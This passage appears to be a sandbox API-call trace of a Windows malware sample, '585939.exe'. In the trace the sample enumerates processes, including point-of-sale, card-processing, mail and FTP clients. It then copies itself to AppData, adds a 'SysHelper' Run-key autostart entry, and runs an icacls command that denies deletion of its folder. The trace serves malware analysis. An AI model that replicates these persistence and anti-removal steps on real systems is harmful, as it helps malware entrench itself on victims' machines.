out: lpBaseName="outlook.exe") returned 0xb [0114.884] CloseHandle (hObject=0x5b8) returned 1 [0114.884] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5b8 [0114.884] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.886] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa50000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0114.886] CloseHandle (hObject=0x5b8) returned 1 [0114.886] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5b8 [0114.886] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.887] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x13a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0114.888] CloseHandle (hObject=0x5b8) returned 1 [0114.888] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5b8 [0114.888] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.889] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xe60000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0114.890] CloseHandle (hObject=0x5b8) returned 1 [0114.890] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5b8 [0114.890] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.891] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0114.891] CloseHandle (hObject=0x5b8) returned 1 [0114.891] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5b8 [0114.891] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.893] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0114.893] CloseHandle (hObject=0x5b8) returned 1 [0114.893] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5b8 [0114.893] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.894] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x240000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0114.895] CloseHandle (hObject=0x5b8) returned 1 [0114.895] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x880) returned 0x5b8 [0114.895] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.896] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x920000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0114.897] CloseHandle (hObject=0x5b8) returned 1 [0114.897] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5b8 [0114.897] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.898] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1070000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0114.899] CloseHandle (hObject=0x5b8) returned 1 [0114.899] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a0) returned 0x5b8 [0114.899] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.900] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1100000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0114.900] CloseHandle (hObject=0x5b8) returned 1 [0114.900] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5b8 [0114.900] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.902] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xf00000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0114.902] CloseHandle (hObject=0x5b8) returned 1 [0114.902] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c0) returned 0x5b8 [0114.902] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.904] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x2f0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0114.904] CloseHandle (hObject=0x5b8) returned 1 [0114.904] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x5b8 [0114.904] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.905] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0114.906] CloseHandle (hObject=0x5b8) returned 1 [0114.906] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x5b8 [0114.906] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.907] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x230000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0114.907] CloseHandle (hObject=0x5b8) returned 1 [0114.907] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x5b8 [0114.907] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.909] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1370000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0114.909] CloseHandle (hObject=0x5b8) returned 1 [0114.909] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x5b8 [0114.909] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.911] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x240000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0114.911] CloseHandle (hObject=0x5b8) returned 1 [0114.911] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x5b8 [0114.911] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.912] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xeb0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0114.913] CloseHandle (hObject=0x5b8) returned 1 [0114.913] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x5b8 [0114.913] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.914] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa90000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0114.915] CloseHandle (hObject=0x5b8) returned 1 [0114.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x5b8 [0114.915] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.916] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x12d0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0114.916] CloseHandle (hObject=0x5b8) returned 1 [0114.917] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x5b8 [0114.917] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.918] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0114.918] CloseHandle (hObject=0x5b8) returned 1 [0114.918] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x5b8 [0114.918] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.920] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0114.920] CloseHandle (hObject=0x5b8) returned 1 [0114.920] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x5b8 [0114.920] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.922] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x340000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0114.922] CloseHandle (hObject=0x5b8) returned 1 [0114.922] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x5b8 [0114.922] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.923] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x9b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0114.924] CloseHandle (hObject=0x5b8) returned 1 [0114.924] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x5b8 [0114.924] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.925] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x12a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0114.926] CloseHandle (hObject=0x5b8) returned 1 [0114.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x5b8 [0114.926] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.927] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1080000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0114.927] CloseHandle (hObject=0x5b8) returned 1 [0114.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x5b8 [0114.927] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.929] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xf60000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0114.929] CloseHandle (hObject=0x5b8) returned 1 [0114.929] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x5b8 [0114.929] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.931] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x8f0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0114.931] CloseHandle (hObject=0x5b8) returned 1 [0114.931] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae8) returned 0x5b8 [0114.931] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.932] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xdf0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="alloy dans.exe") returned 0xe [0114.933] CloseHandle (hObject=0x5b8) returned 1 [0114.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf8) returned 0x5b8 [0114.933] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.934] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x12c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="bible_wiley_seminars.exe") returned 0x18 [0114.934] CloseHandle (hObject=0x5b8) returned 1 [0114.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb08) returned 0x5b8 [0114.934] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.936] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1030000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="publishedarmstrongdarwin.exe") returned 0x1c [0114.936] CloseHandle (hObject=0x5b8) returned 1 [0114.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x5b8 [0114.936] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.938] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xfe0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="mv-times.exe") returned 0xc [0114.938] CloseHandle (hObject=0x5b8) returned 1 [0114.938] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x5b8 [0114.938] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.939] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1030000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="expressmsie.exe") returned 0xf [0114.940] CloseHandle (hObject=0x5b8) returned 1 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x270) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x748) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x0 [0114.940] CloseHandle (hObject=0x0) returned 0 [0114.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x5b8 [0114.940] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.942] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x400000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="585939.exe") returned 0xa [0114.942] CloseHandle (hObject=0x5b8) returned 1 [0114.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x699bc0 [0114.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x6c20b0 [0114.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x3275ab0 [0114.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x326e3b8 [0114.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x32840c8 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x326c3f8 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x327fc38 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x6cbac0 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x6cbd28 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x3287c60 [0114.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x3287ec8 [0114.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d850 | out: phkResult=0x18d850*=0x5b8) returned 0x0 [0114.972] RegQueryValueExW (in: hKey=0x5b8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d84c, lpData=0x18bf78, lpcbData=0x18d830*=0x400 | out: lpType=0x18d84c*=0x0, lpData=0x18bf78*=0x0, lpcbData=0x18d830*=0x400) returned 0x2 [0114.972] RegCloseKey (hKey=0x5b8) returned 0x0 [0114.972] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0114.973] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0114.973] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " [0114.973] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" ", pNumArgs=0x18d814 | out: pNumArgs=0x18d814) returned 0x329edd8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0114.973] lstrcpyW (in: lpString1=0x18b778, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0114.973] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="585939.exe" [0114.973] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18cf78 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0114.973] UuidCreate (in: Uuid=0x18d7c4 | out: Uuid=0x18d7c4) returned 0x0 [0114.973] UuidToStringW (in: Uuid=0x18d7c4, StringUuid=0x18d858 | out: StringUuid=0x18d858) returned 0x0 [0114.973] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x3262340 [0114.973] RpcMgmtStatsVectorFree (in: StatsVector=0x18d858 | out: StatsVector=0x18d858) returned 0x0 [0114.973] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="45df4fd3-2e0d-4883-810e-1f70f9babe97" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97") returned 1 [0114.974] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\45df4fd3-2e0d-4883-810e-1f70f9babe97"), lpSecurityAttributes=0x0) returned 1 [0114.975] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xb0) returned 0x32a45d8 [0114.975] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xb0) returned 0x32a4690 [0114.975] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97", pMore="585939.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned 1 [0114.975] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe")) returned 0 [0114.975] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe"), bFailIfExists=0) returned 1 [0115.022] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d854 | out: phkResult=0x18d854*=0x5bc) returned 0x0 [0115.023] lstrcpyW (in: lpString1=0x18c778, lpString2="\"" | out: lpString1="\"") returned="\"" [0115.023] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe" [0115.023] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart" [0115.023] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart") returned 105 [0115.023] RegSetValueExW (in: hKey=0x5bc, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart", cbData=0xd2 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart") returned 0x0 [0115.023] RegCloseKey (hKey=0x5bc) returned 0x0 [0115.023] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc0) returned 0x328b468 [0115.023] SetLastError (dwErrCode=0x0) [0115.023] lstrcpyW (in: lpString1=0x18a778, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0115.023] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97" [0115.023] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0115.023] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d778*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d7d4 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d7d4*(hProcess=0x5b8, hThread=0x5bc, dwProcessId=0x918, dwThreadId=0x928)) returned 1 [0115.038] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.054] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.069] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.085] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.132] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.147] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.163] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.318] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.319] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.335] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.352] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.366] WaitForSingleObject (hHandle=0x5b8, 